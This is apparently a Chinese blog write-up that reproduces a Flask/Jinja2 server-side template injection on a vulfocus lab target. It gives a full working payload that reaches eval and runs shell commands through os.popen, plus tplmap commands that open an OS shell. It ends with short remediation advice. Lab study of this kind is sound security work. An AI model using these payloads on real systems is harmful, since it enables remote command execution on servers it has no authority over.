flask-ssti 模板注入复现

所有文章,仅供安全研究与学习之用,后果自负!

flask-ssti 模板注入复现

0x01 漏洞描述

Flask 是一个 web 框架。也就是说 Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 wdb 应用程序可以使一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。

0x02 影响范围

0x03 漏洞复现

访问靶场
在这里插入图片描述

1 手工验证漏洞是否存在

?name=123
?name=<script>alert(123)</script>
?name={
   
   {2*3}}

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2.执行命令

poc 如下
修改 “id” 即可

?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{
   
   { b['eval']('__import__("os").popen("id").read()') }}{% endif %}{% endif %}  {% endfor %}{% endif %}{% endfor %}

在这里插入图片描述

获取flag

http://vulfocus.fofa.so:24935/?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{
   
   { b['eval']('__import__("os").popen("ls /tmp").read()') }}{% endif %}{% endif %}  {% endfor %}{% endif %}{% endfor %}

在这里插入图片描述

扫描二维码关注公众号,回复: 13363107 查看本文章

tplmap工具验证

python2 运行

python2 tplmap.py   -u 'http://vulfocus.fofa.so:24935/?name=guest'

存在漏洞
在这里插入图片描述

执行系统命令

python2 tplmap.py  --os-shell  -u 'http://vulfocus.fofa.so:24935/?name=guest'

在这里插入图片描述

0x04 漏洞修复

针对于不同的模板引擎,该漏洞的修复方法会有所不同,但如果在传递给模板指令之前,对用户输入进行安全过滤的话,则可以大大减少这类威胁。

另一种防御方法是使用沙箱环境,将危险的指令删除/禁用,或者对系统环境进行安全加固。

猜你喜欢

转载自blog.csdn.net/YouthBelief/article/details/121469005